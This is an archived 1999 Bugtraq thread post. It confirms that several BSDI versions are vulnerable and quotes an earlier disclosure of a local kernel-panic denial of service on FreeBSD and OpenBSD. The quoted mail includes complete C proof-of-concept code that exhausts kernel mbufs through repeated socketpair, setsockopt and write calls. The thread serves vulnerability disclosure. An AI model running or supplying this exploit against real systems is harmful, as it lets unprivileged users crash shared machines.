Bugtraq mailing list archives
Re: Local DoS on network by unpriviledged user using setsockopt()
From: dvorak () CAPU NET (John N Dvorak)
Date: Fri, 3 Sep 1999 09:47:18 -0400
Just Verified all versions of BSDI in my possession (2.1, 3.1, 4.0, 4.01) are vulnerable. I do not have all the details, but the kernel panics. System eventually reboots in 2.1. Can be executed by any non-privileged user. JD On Wed, 1 Sep 1999, Sven Berkvens wrote:
Recently, I mailed this mailing to a number of people who are concerned with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The mailing was NOT intended to be made public, but somehow it was. Here is my original mailing: --- Forwarded --- I stumbled across a denial of service attack on FreeBSD systems, where an unpriviledged user can panic the kernel. Quick and dirty testing (code attached at the end of this mail) showed OpenBSD is vulnerable too: FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to test it on older FreeBSD versions. OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192: The kernel logs one "/bsd: mb_map full" and all processes trying to send something over the network get stuck waiting in mbuf. Locally the system continues to function. Tested by a friend. NetBSD: Not available, but it is highly probable that the affected code in OpenBSD is from its parent NetBSD. As far as I'm concerned, this can be handled quietly and without much haste. Knowledge of this problem is limited and there is absolutely no intention of publishing this exploit or messages to Bugtraq. With kind regards, Sven Berkvens (sven () ilse nl) Long time FreeBSD-system administrator The source code for the program that causes this: #include <unistd.h> #include <sys/socket.h> #include <fcntl.h> #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); } ----- End forwarded message -----
=========================================== John N Dvorak | dvorak () capu net Director of Technology CapuNet, LLC - Corporate Internet Solutions (301) 881-4900 x8018 ===========================================
Current thread:
- Local DoS on network by unpriviledged user using setsockopt() Sven Berkvens (Sep 01)
- Re: Local DoS on network by unpriviledged user using setsockopt() John N Dvorak (Sep 03)
- Re: Local DoS on network by unpriviledged user using setsockopt() John N Dvorak (Sep 03)
- Re: Local DoS on network by unpriviledged user using setsockopt() Lamont Granquist (Sep 08)
- Re: Local DoS on network by unpriviledged user using setsockopt() FreeBSD -- The Power to Serve (Sep 03)
- another xploit for netscape 4.6 Narr0w (Sep 04)
- <Possible follow-ups>
- Re: Local DoS on network by unpriviledged user using setsockopt() John N Dvorak (Sep 08)
- Re: Local DoS on network by unpriviledged user using setsockopt() Dylan Griffiths (Sep 08)